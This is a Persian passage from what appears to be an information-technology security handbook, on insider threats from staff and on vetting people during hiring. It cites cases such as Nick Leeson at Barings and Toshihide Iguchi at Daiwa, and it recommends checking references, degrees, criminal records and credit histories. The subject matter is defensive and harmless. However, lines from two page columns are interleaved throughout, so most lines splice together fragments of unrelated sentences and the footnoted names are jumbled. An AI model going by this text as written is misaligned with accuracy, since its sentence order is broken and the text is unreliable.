‫ﺑﻪ ﺧﺎﻧﻪﺍﺵ ﻣﻲﺑـﺮﺩ ﻭ ﺩﺭ ﺁﻧﺠـﺎ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﺫﺧﻴـﺮﻩ‬ ‫ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﺯ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﻧﺸﺄﺕ ﻣﻲ ﮔﻴﺮﻧﺪ‪ .‬ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻣﻲﻛﺮﺩ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﻱ "ﻃﺒﻘﻪﺑﻨﺪﻱ ﻧﺸﺪﻩ" ﭘﻴﻜﺮﺑﻨـﺪﻱ‬ ‫ﻛﺎﺭﻛﻨﺎﻥ ﺍﺯ ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺍﺧﺮﺍﺝ ﮔﺮﻓﺘﻪ ﺗﺎ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔـﺎﻫﻲ ﺁﻧـﺎﻥ‬
‫ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺍﻃﻼﻋـﺎﺕ ﻃﺒﻘـﻪ ﺑﻨـﺪﻱﺷـﺪﻩ ﺩﺭ‬ ‫ﻧﻘﺸﻲ ﺣﻴﺎﺗﻲ ﺩﺭ ﻋﻤﻠﻜﺮﺩ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ ﻭ ﺩﻓﺎﻋﻲ ﺳﺎﺯﻣﺎﻥ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻗــﺮﺍﺭ ﺩﺍﺷــﺘﻨﺪ‪ ،‬ﺍﺯ ﺁﻧﻬــﺎ ﺑــﺮﺍﻱ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺒﺘـﺬﻝ ﻭ ﻏﻴـﺮ ﺍﺧﻼﻗـﻲ ﻫـﻢ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﻧﺸﺄﺕﮔﺮﻓﺘﻪ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ؛‬


‫ﻣــﻲﺷــﺪ ‪ -‬ﭘﺎﻳﮕﺎﻫﻬــﺎﻳﻲ ﻛــﻪ ﻣﻤﻜــﻦ ﺑــﻮﺩ ﻫــﻢ ﺍﺯ‬ ‫ﺗﻬﺪﻳﺪﻱ ﭘﻨﻬﺎﻥ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ‬
‫ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﻋﻤــﻮﻣﻲ ﻭ ﻣﻨﺘــﺸﺮﺷﺪﻩ ﻭ ﻫــﻢ ﺍﺯ‬ ‫ﭼﻨﺪ ﻓﻘﺮﻩ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺧﺒﺮﺳﺎﺯﻱ ﻛـﻪ ﻃـﻲ ﭼﻨـﺪ ﺳـﺎﻝ ﺍﺧﻴـﺮ‬
‫ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻭ ﺍﻓﺸﺎﻧـﺸﺪﻩ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﺑـﻪ‬ ‫ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺮﺍﺟﻌﻪﻛﻨﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜـﻪ‬
‫ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻣﻘﺮﺭﺍﺕ ﻭ ﻗﻮﺍﻧﻴﻦ ﻣﺘﻌﺪﺩﻱ ﺗﻮﺳﻂ ﺩﺍﭺ ﺯﻳـﺮ‬ ‫ﻧﻴــﻚ ﻟﻴــﺴﻮﻥ‪ ٨٩‬ﻳــﻚ ﺗــﺎﺟﺮ ﺳ ـﺮﻣﺎﻳﻪﮔــﺬﺍﺭ ﺩﺭ ﺑﺎﻧــﻚ‬ ‫•‬

‫ﭘﺎ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﻫﻴﭻ ﺍﻗـﺪﺍﻡ ﻋﻤﻠـﻲ ﻋﻠﻴـﻪ ﺍﻭ ﺍﻧﺠـﺎﻡ‬ ‫ﺑﺎﺭﻳﻨﮕﺰ‪ ٩٠‬ﺷﻌﺒﺔ ﺳﻨﮕﺎﭘﻮﺭ‪ ،‬ﻭ ﺗﻮﺷﻴﻬﺎﻳﺪ ﺍﻳﮕﻮﭼﻲ‪ ٩١‬ﺍﺯ ﺩﻓﺘﺮ‬
‫ﻧﺸﺪ ﻭ ﺩﺭ ﺁﺧﺮﻳﻦ ﺭﻭﺯ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ ﻛﻠﻴﻨﺘـﻮﻥ ﻧﻴـﺰ‬ ‫ﻧﻴﻮﻳﻮﺭﻙ ﺑﺎﻧﻚ ﺩﺍﻳﻮﺍ‪ ٩٢‬ﻫﺮ ﺩﻭ ﺍﻗﺪﺍﻡ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ‬
‫ﻣﻮﺭﺩ ﻋﻔﻮ ﻭﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪.‬‬ ‫ﭘﺮ ﻣﺨﺎﻃﺮﻩﺍﻱ ﻛﺮﺩﻧﺪ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻣﻘﺎﺩﻳﺮ‬
‫ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﺯ ﺳﺮﻣﺎﻳﺔ ﺑﺎﻧﻜﻬﺎﻳﺸﺎﻥ ﺷﺪ؛ ﺍﻣﺎ ﺁﻧﻬﺎ ﺑﺠـﺎﻱ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻭ ﺳﺎﻳﺮ ﻗﺎﻧﻮﻥﺷﻜﻨﻴﻬﺎ ﻭ ﺗﺨﻠﻔﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ‬ ‫ﭘــﺬﻳﺮﺵ ﺷﻜــﺴﺖ‪ ،‬ﺳــﻮﺍﺑﻖ ﺣــﺴﺎﺑﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺭﺍ‬
‫ﻃﻲ ﭼﻨﺪ ﺩﻫﺔ ﺍﺧﻴﺮ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ ،‬ﻳﻚ ﻭﻳﮋﮔﻲ ﻣﺸﺘﺮﻙ ﺩﺭ ﺁﻧﻬـﺎ‬ ‫ﻝ ﺑـﺎﺯ ﻫـﻢ‬‫ﻼ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﭘـﻮ ﹺ‬
‫ﺩﺳﺘﻜﺎﺭﻱ ﻛﺮﺩﻧﺪ ﻭ ﻋﻤ ﹰ‬
‫ﻣﻲﺑﻴﻨﻴﺪ‪ :‬ﻫﻤﺔ ﺁﻧﻬﺎ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺑﻮﻗﻮﻉ ﭘﻴﻮﺳﺘﻪﺍﻧﺪ‪ .‬ﻋﻮﺍﻣﻞ ﻧﻔـﻮﺫ‪،‬‬ ‫ﺑﻴﺸﺘﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺟﺒﺮﺍﻥ ﺿﺮﺭﻫﺎﻱ ﻗﺒﻠﻲ ﻭﺍﺭﺩ ﺍﻳـﻦ ﻗﻤـﺎﺭ‬
‫ﺍﻓﺮﺍﺩ ﺑﻮﺩﻩﺍﻧﺪ؛ ﻭﻳﺮﻭﺳـﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺍﻓـﺮﺍﺩ ﻧﻮﺷـﺘﻪ ﺑﻮﺩﻧـﺪ؛ ﻭ‬ ‫ﻧﻤﻮﺩﻧﺪ؛ ﻭ ﺳﺮﺍﻧﺠﺎﻡ ﻧﻴﺰ ﺑﻌﺪ ﺍﺯ ﻭﺍﺭﺩ ﺁﻭﺭﺩﻥ ﺑﻴﺶ ﺍﺯ ﻳـﻚ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﻧﻴﺰ ﺍﻓﺮﺍﺩ ﺩﺯﺩﻳﺪﻩ ﺑﻮﺩﻧﺪ‪.‬‬ ‫ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺯﻳﺎﻥ ﺑـﻪ ﻫﺮﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﺩﻭ ﺑﺎﻧـﻚ ﻣـﻮﺭﺩ‬
‫ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ" ﻋﺒﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﻫﻤـﺔ ﻣﻮﺍﺭﺩﻳﻜـﻪ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬ ‫ﺷﻨﺎﺳﺎﻳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ‪ .‬ﺩﺭ ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﺍﻗـﺪﺍﻣﺎﺕ ﺑﺎﻧـﻚ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲ ﺷﻮﺩ‪ :‬ﺍﺳﺘﺨﺪﺍﻡ‪ ،‬ﺁﻣﻮﺯﺵ‪ ،‬ﻛﻨﺘﺮﻝ ﺭﻓﺘﺎﺭ‪ ،‬ﻭ ﮔﺎﻫﻲ ﻧﻴﺰ‬ ‫ﺑﺎﺭﻳﻨﮕﺰ ﻣﺠﺒﻮﺭ ﺑﻪ ﺍﻋﻼﻡ ﻭﺭﺷﻜﺴﺘﮕﻲ ﺷﺪ ﻭ ﺑﺎﻧﻚ ﺩﺍﻳـﻮﺍ‬
‫ﺍﺧﺮﺍﺝ‪ .‬ﺁﻣﺎﺭ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺩﺳﺘﺔ ﻣﺮﺗﻜﺒﻴﻦ ﺟـﺮﺍﺋ ﹺﻢ‬ ‫ﻧﻴﺰ ﻣﺠﻮﺯ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺭﺍ‬
‫ﺳﻨﮕﻴﻦ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺴﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻳﺎ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻗـﺎﻧﻮﻧﻲ ﺑـﻪ‬ ‫ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩ‪.‬‬
‫ﺩﺍﺩﻩﻫﺎ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ ﻭ ﻳـﺎ ﺩﺭ ﮔﺬﺷـﺘﺔ ﻧﺰﺩﻳـﻚ ﺍﺯ ﺁﻥ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬

‫‪93‬‬ ‫‪Aldrich Ames‬‬


‫‪94‬‬ ‫‪Janathon Pollard‬‬ ‫‪89‬‬ ‫‪Nick Leeson‬‬
‫‪95‬‬ ‫‪Robert Hanson‬‬ ‫‪90‬‬ ‫‪Barings Bank‬‬
‫‪96‬‬ ‫‪Robert Walker‬‬ ‫‪91‬‬ ‫‪Toshihide Iguchi‬‬
‫‪97‬‬ ‫‪John Deutch‬‬ ‫‪92‬‬ ‫‪Daiwa‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٦٠‬‬

‫ﻛﻨﻜﺎﺵ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺍﻋﺘﺒﺎﺭ ﻫﺮ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻭ‬ ‫ﺑﻮﺩﻩﺍﻧﺪ‪ .‬ﺑﻌﻀﻲ ﻣﻄﺎﻟﻌـﺎﺕ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺑـﻴﺶ ﺍﺯ ‪%۸۰‬‬
‫ﻣﺪﺭﻙ ﺗﺤﺼﻴﻠﻲ ﺭﺍ ﺑﺴﻨﺠﻴﺪ؛ ﺯﻳﺮﺍ ﺗﺎﻛﻨﻮﻥ ﺑﺴﻴﺎﺭ ﭘﻴﺶ ﺁﻣﺪﻩ ﻛـﻪ‬ ‫ﺭﺧﺪﺍﺩﻫﺎ ﺗﻮﺳﻂ ﭼﻨﻴﻦ ﺍﻓﺮﺍﺩﻱ ﺭﺥ ﻣـﻲﺩﻫـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻗـﺴﻤﺖ‬
‫ﺍﻓﺮﺍﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﻣﺪﺍﺭﻙ ﺗﺤﺼﻴﻠﻲ ﺧﻮﺩ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩﻫـﺎﻱ ﻣﻌﺘﺒـﺮ‬ ‫ﻣﻬﻤﻲ ﺍﺯ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺏ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺍﺩﺍﺭﺓ ﻛﺎﺭﻛﻨﺎﻥ‬
‫ﺳﺨﻦ ﺭﺍﻧﺪﻩﺍﻧﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺁﻥ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻫـﻴﭻ ﺳـﺎﺑﻘﻪﺍﻱ ﺩﺭ‬ ‫ﺑﺎ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻃﺒﻘﻪﺑﻨﺪﻱﺷﺪﻩ‪.‬‬
‫ﺍﺧﺘﻴﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ ﻛﻪ ﻧﺸﺎﻥ ﺩﻫﺪ ﺣﺘﻲ ﻳﻚ ﻭﺍﺣﺪ ﺩﺭﺳﻲ ﺗﻮﺳﻂ ﺁﻥ‬ ‫ﺍﻓﺮﺍﺩ ﺑﻪ ﺩﻭ ﺻﻮﺭﺕ ﺩﺭ ﺑﺮﻭﺯ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺗـﺄﺛﻴﺮ‬
‫ﺍﻓﺮﺍﺩ ﺑﺼﻮﺭﺕ ﻛﺎﻣﻞ ﮔﺬﺭﺍﻧﺪﻩ ﺷﺪﻩ ﺍﺳﺖ! ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﻧﻴﺰ ﻣﻤﻜﻦ‬ ‫ﺩﺍﺭﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑـﺎ ﺩﻧﺒـﺎﻝ ﻧﻜـﺮﺩﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺑـﻪ‬
‫ﺍﺳﺖ ﻣﺪﺍﺭﻛﻲ ﺍﺭﺋﻪ ﻛﻨﻨﺪ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻳﻲ ﺑﺎﺷـﺪ ﻛـﻪ‬ ‫ﻓﺮﺍﻣﻮﺷﻲ ﺳﭙﺮﺩﻥ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻭ ﻣﻄﻠـﻊ ﻧﺒـﻮﺩﻥ ﺍﺯ ﻧﺘـﺎﻳﺞ‬
‫ﺗﻨﻬﺎ ﺍﻧﺪﻛﻲ ﺑﺰﺭﮔﺘﺮ ﺍﺯ ﻳﻚ ﺩﻓﺘﺮ ﭘـﺴﺘﻲ ﻫـﺴﺘﻨﺪ! ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ‬ ‫ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺳﻬﻮﹰﺍ ﺑﻪ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺑﺎﺷﻴﺪ ﺍﺯ ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﻪ ﺍﺳﺘﺨﺪﺍﻡ ﺩﺭ ﺁﻣﺪﻥ ﺩﺭ ﻳﻚ ﺷﻐﻞ ﺑﻪ‬ ‫ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺁﮔﺎﻫﺎﻧـﻪ ﻛﻨﺘﺮﻟﻬـﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ﺭﺍ‬
‫ﺩﺭﻭﻍ ﻣﺘﻮﺳﻞ ﻣﻲﺷﻮﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺩﺭ ﻣـﺸﺎﻏﻞ ﺣـﺴﺎﺱ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﺯﻳﺮ ﭘﺎ ﻣﻲﮔﺬﺍﺭﻧﺪ ﺗﺎ ﺑﻪ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ﻛﻤﻚ ﻛﺮﺩﻩ ﺑﺎﺷـﻨﺪ ﻳـﺎ‬
‫ﻛﺮﺩ‪.‬‬ ‫ﻼ ﺍﺷـﺎﺭﻩ‬‫ﺧﻮﺩ ﺑﺘﻨﻬﺎﻳﻲ ﺑﺎﻋﺚ ﻭﻗﻮﻉ ﺁﻥ ﺷﻮﻧﺪ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﻗـﺒ ﹰ‬
‫ﺗﺤﻘﻴﻘﺎﺕ ﻣﺘﻤﺮﻛﺰ‬ ‫ﻛــﺮﺩﻳﻢ ﺩﺭ ﺑﻴــﺸﺘﺮ ﻣــﻮﺍﺭﺩ ﺍﻓــﺮﺍﺩﻱ ﻛــﻪ ﺑــﺼﻮﺭﺕ ﺁﮔﺎﻫﺎﻧــﻪ ﺩﺭ‬
‫ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺤﻘﻴﻘﺎﺕ ﺟـﺪﻱﺗـﺮﻱ ﺩﺭ‬ ‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﻧﻘﺶ ﺩﺍﺭﻧﺪ ﻛﺴﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﻛﺎﺭﻣﻨـﺪ‬
‫ﺧﻮﺩﺗﺎﻥ ﻣﻲﺑﺎﺷﻨﺪ )ﻳﺎ ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﺑﻮﺩﻩﺍﻧﺪ(‪ :‬ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎ‬
‫ﺭﺍﺑﻄﻪ ﺑﺎ ﺷﺨﺼﻴﺖ ﻭ ﭘﻴﺸﻴﻨﺔ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺑـﺎ ﺗﻮﺟـﻪ‬
‫ﻣﻄﻠﻌﻨﺪ ﻭ ﻣﻲ ﺩﺍﻧﻨﺪ ﭼﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺑﺎ ﭼﻪ ﺍﺭﺯﺷﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ‬
‫ﺑﻪ ﺳﻄﺢ ﺷﻐﻠﻲ ﻛﻪ ﻗـﺮﺍﺭ ﺍﺳـﺖ ﻣﺘﻘﺎﺿـﻲ ﺩﺭ ﺁﻥ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﻭ‬
‫ﻛﺪﺍﻡ ﻗﺴﻤﺖ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺳﺘﺮﺳﻴﻬﺎﻳﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ ﺣـﺴﺎﺱ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺷﺎﻳﺪ ﺑﺨﻮﺍﻫﻴﺪ‪:‬‬ ‫ﻼ ﻳـﻚ ﺳﻴـﺴﺘﻢ ‪ Unix‬ﺭﺍ ﺭﺍﻫﺒـﺮﻱ‬ ‫ﺷﻤﺎ ﺩﺭ ﻃﻮﻝ ﻣﺪﺗﻲ ﻛﻪ ﻣﺜ ﹰ‬
‫ﺍﺯ ﻛﻤﻚ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﻭﻳـﮋﺓ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﺑـﺮﺍﻱ‬ ‫•‬
‫ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺍﻓﺮﺍﺩﻱ ﺍﺯ ﻫﺮ ﺩﻭ ﮔـﺮﻭﻩ ﻣﻮﺍﺟـﻪ ﺷـﻮﻳﺪ‪.‬‬
‫ﺑﺮﺭﺳﻲ ﭘﻴﺸﻴﻨﺔ ﺍﻓﺮﺍﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛‬ ‫ﻛﻨﺘﺮﻟﻬﺎ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺴﻴﺎﺭ ﻣﺘﻌـﺪﺩ‬
‫ﻭ ﮔﻮﻧﺎﮔﻮﻥ ﻫﺴﺘﻨﺪ ﻭ ﺑﺤﺚ ﻭ ﺑﺮﺭﺳﻲ ﺗﻤﺎﻣﻲ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﻛﺘـﺎﺏ‬
‫ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺳﻨﺪ ﻋﺪﻡ ﺳﻮﺀ ﭘﻴﺸﻴﻨﺔ ﺟﻨﺎﻳﻲ ﺑﺨﻮﺍﻫﻴﺪ؛‬ ‫•‬ ‫ﻦ ﺁﻧﻬﺎ‬
‫ﻛﺎﻣﻞ ﻧﻴﺎﺯ ﺩﺍﺭﺩ؛ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺎ ﺗﻨﻬﺎ ﺑﻪ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﻣﻬﻤﺘﺮﻳ ﹺ‬
‫ﺳﻮﺍﺑﻖ ﺍﻋﺘﺒﺎﺭﻱ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴـﺪ ﺁﻳـﺎ‬ ‫•‬ ‫ﻣﻲ ﭘﺮﺩﺍﺯﻳﻢ‪ .‬ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻧﻤﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﻭﻗـﻮﻉ‬
‫ﺑﺪﻫﻲﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺰﺭﮔﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ ﻛﻪ ﺍﺯ ﭘـﺲ ﺁﻥ ﺑـﺮ‬ ‫ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ‬
‫ﻧﻴﺎﻣﺪﻩ ﺑﺎﺷﻨﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﺍﮔﺮ ﻣﻮﺭﺩﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ ﺩﺭﺑـﺎﺭﺓ ﺁﻥ‬ ‫ﻛﻪ ﺍﺯ ﺟﺎﻧﺐ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺧﻮﺩﺗـﺎﻥ ﻣﺘﻮﺟـﻪ ﺷـﺮﻛﺖ ﺷﻤﺎﺳـﺖ ﺭﺍ‬
‫ﺑﺎ ﺧﻮﺩ ﻣﺘﻘﺎﺿـﻲ ﮔﻔﺘﮕـﻮ ﻛﻨﻴـﺪ‪ .‬ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﻣﻘـﺮﻭﺽ‬ ‫ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﻫﺴﺘﻨﺪ ﻧﺒﺎﻳـﺪ ﺍﺯ ﻛـﺎﺭ ﻛـﺮﺩﻥ ﻣﺤـﺮﻭﻡ ﺷـﻮﻧﺪ؛ ﭼـﻮﻥ ﺩﺭ‬
‫ﺍﻳﻨﺼﻮﺭﺕ ﻫﻴﭽﮕﺎﻩ ﻗﺪﺭﺕ ﺑﺎﺯﭘﺮﺩﺍﺧﺖ ﺑـﺪﻫﻲﻫﺎﻳـﺸﺎﻥ ﺭﺍ‬ ‫ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺍﺳﺘﺨﺪﺍﻡ‬
‫ﭘﻴﺪﺍ ﻧﺨﻮﺍﻫﻨﺪ ﻛﺮﺩ‪ .‬ﺍﻟﺒﺘﻪ ﻧﺒﺎﻳـﺪ ﺍﺯ ﻧﻈـﺮ ﺩﻭﺭ ﺩﺍﺷـﺖ ﻛـﻪ‬
‫ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺭﻓﺘﺎﺭ ﻧﺎﺩﺭﺳﺖ ﻛﺎﺭﻱ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻧﻲﻛﻪ ﺗﺤـﺖ‬ ‫ﺑﺮﺭﺳﻲ ﭘﻴﺸﻴﻨﻪﻫﺎ‬
‫ﻓﺸﺎﺭﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻫﺴﺘﻨﺪ ﺑﻴﺸﺘﺮ ﺍﺳﺖ‪.‬‬ ‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻛﺎﺭﻛﻨﺎﻥ ﺟﺪﻳﺪ ﺭﺍ ﺍﺳﺘﺨﺪﺍﻡ ﻣﻲﻛﻨﻴﺪ ﭘﻴـﺸﻴﻨﺔ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺑﻌﻤﻞ ﺁﻭﺭﺩﻥ ﺁﺯﻣـﻮﻥ ﺩﺭﻭﻍ ﺳـﻨﺠﻲ ﺍﺯ ﻣﺘﻘﺎﺿـﻲ ﺭﺍ )ﺍﮔـﺮ‬ ‫•‬
‫ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺧﻮﺍﺳـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬
